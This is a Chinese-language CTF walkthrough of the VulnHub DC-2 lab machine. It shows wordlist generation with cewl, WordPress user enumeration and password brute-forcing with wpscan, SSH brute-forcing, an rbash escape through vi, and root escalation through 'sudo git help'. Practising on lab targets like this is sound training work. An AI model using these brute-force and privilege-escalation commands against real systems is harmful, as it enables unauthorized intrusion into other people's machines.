vulnhub-dc2打靶

环境

vulnhub环境,项目地址https://www.vulnhub.com/entry/dc-2,311/
靶机:172.16.17.143
攻击机kali:172.16.17.140

目标

信息收集

找到靶机ip

打开跳转dc-2/,502

抓包发现301永久跳转一个页面

添加一个解析


拿到第一个flag,提示我们使用cewl来生成密码

爆破


cewl使用 https://www.freebuf.com/articles/network/190128.html

使用cewl生成字典

需要扫出登录点

经典wordpress

掏出wpscan,枚举用户

1
wpscan --url  http://dc-2 -e u

将用户名写入txt,开始爆破

1
wpscan --url  http://dc-2 -U name.txt -P pwd.txt

登录jerry账号发现flag2

flag提示,如果wp没法利用就找别的方法,想到刚刚信息收集还有ssh,用这两个账号去试试

msf爆破ssh

最后使用tom用户成功登录

提权

尝试之后发现权限很低,使用vi查看内容


得到提示,尝试su,发现没有这个命令,查看一下当前用户的环境变量

使用vi尝试绕过,得到一个正常环境变量

1
2
3
4
5
6
7
8
9
10
11
vi a.txt

#设置shell变量
:shell = /bin/bash

#启动shell
:shell

# 导入环境变量
export PATH=$PATH:/bin

登录jerry,使用刚刚爆破出的密码,得到flag4.txt,没有提示

查看历史命令,发现有使用sudo git,也就是说git是有root权限的

git提权

1
2
3
4
5
6
7
8
sudo git help add
末尾输入!/bin/bash

或者

sudo git help config
末尾输入
!'sh'